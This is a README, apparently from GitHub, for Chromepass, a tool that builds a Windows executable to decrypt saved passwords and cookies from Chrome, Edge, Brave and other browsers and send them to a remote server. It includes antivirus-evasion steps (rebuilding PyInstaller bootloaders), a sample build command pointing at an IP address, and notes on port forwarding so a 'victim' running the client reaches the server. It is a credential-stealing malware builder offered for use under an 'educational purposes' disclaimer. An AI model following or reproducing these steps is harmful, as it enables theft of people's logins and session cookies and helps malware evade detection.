darkarp / Chromepass
Projects that are alternatives of or similar to Chromepass
Chromepass - Hacking Chrome Saved Passwords and Cookies
View Demo · Report Bug · Request Feature
Table of Contents
About The project
Chromepass is a python-based console application that generates a windows executable with the following features:
- Decrypt Google Chrome, Chromium, Edge, Brave, Opera and Vivaldi saved paswords and cookies
- Send a file with the login/password combinations and cookies remotely (http server)
- Undetectable by AV if done correctly
- Custom icon
- Custom error message
- Customize port
AV Detection!
This can be undetected with a very easy step, detailed below. It is detected mainly because many AVs get tripped by the popular signatures of pyinstaller. To mitigate this, you can build the bootloaders manually. You can do this on a clean VM if you wish:
- Go through the Installation first
- Open an administrator powershell
- Run the following code and wait for it to finish, it might take a while:
Set-ExecutionPolicy remotesigned -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1')); choco install -y python vcbuildtools git
- Close the powershell window and open a new one as administrator again.
- Go into the chromepass directory, if you're not in it already.
- Run the following code:
git clone https://github.com/pyinstaller/pyinstaller.git
pip uninstall pyinstaller -y
cd pyinstaller/bootloader
python waf all
cd ..
pip install .
- Now you can follow the Usage normally and your executable is no longer detected by most AVs. There are some additional things you can do to make it completely undetectable. I'll leave you to discover what some of those things are.
Getting started
Dependencies and Requirements
This is a very simple application, which uses only:
- Python - Tested on python 3.6+
Optionally, you may want to run all python commands inside a python virtual environment. For more information, check Virtual Environment Guide
Installation
Chromepass requires Windows to run! Support for linux and macOS may be added soon
Clone the repository:
git clone https://github.com/darkarp/chromepass
Install the dependencies:
cd chromepass
pip install -r requirements.txt
If any errors occur make sure you're running on the proper environment (if applcable) and that you have python 3.6+ If the errors persist, try:
python -m pip install --upgrade pip
python -m pip install -r requirements.txt
Usage
Chromepass is very straightforward. Start by running:
python create.py -h
A list of options will appear and are self explanatory.
Running without any parameters will build the server and the client connecting to 127.0.0.1
.
A simple example of a build:
python create.py --ip 92.34.11.220 --error --message "An Error has happened"
After creating the server and the client, make sure you're running the server when the client is ran.
The cookies and passwords will be saved in json
files on a new folder called data
in the same directory as the server, separated by ip address.
If you'd like additional notes on evading AV, refer to AV Detection
Remote Notes
If you'd like to use this in a remote scenario, you must also perform port forwarding (port 80 by default), so that when the victim runs the client it is able to connect to the server on the correct port.
For more general information, click here. If you're still not satisfied, perform a google search.
Virtual Environment Guide
Virtual environments are essentially local, isolated, python installations with its own set of libraries, that you can activate or deactivate at any time, so as to not interfere with other python configurations.
To create a virtual environment you may use a package manager, such as conda
(through miniconda or anaconda), or you may do so with the built-in python module venv
.
As an example, this creates a virtual environment called chromepass_env
python -m venv chromepass_env
You should now have a folder with this name. To activate this environment:
- Windows Powershell
.\chromepass_env\Scripts\Activate.ps1
- Linux
source chromepass_env/bin/activate
You should now see this name inside parenthesis on the left side of your powershell prompt, before the current working path.
Every python command and installation command you perform will be done inside this environment. To deactivate it:
deactivate
When using a virtual environment, remember that every time you open a new powershell window, the environment needs to be activated again, if you wish to use it.
Using a virtual environment is not necessary, though it is recommended if you deal with many python projects, as a tool to better organize them.
Errors, Bugs and feature requests
If you find an error or a bug, please report it as an issue. If you wish to suggest a feature or an improvement please report it in the issue pages.
Please follow the templates shown when creating the issue.
Learn More
For access to a community full of aspiring computer security experts, ranging from the complete beginner to the seasoned veteran, join our Discord Server: WhiteHat Hacking
If you wish to contact me, you can do so via: [email protected]
Disclaimer
I am not responsible for what you do with the information and code provided. This is intended for professional or educational purposes only.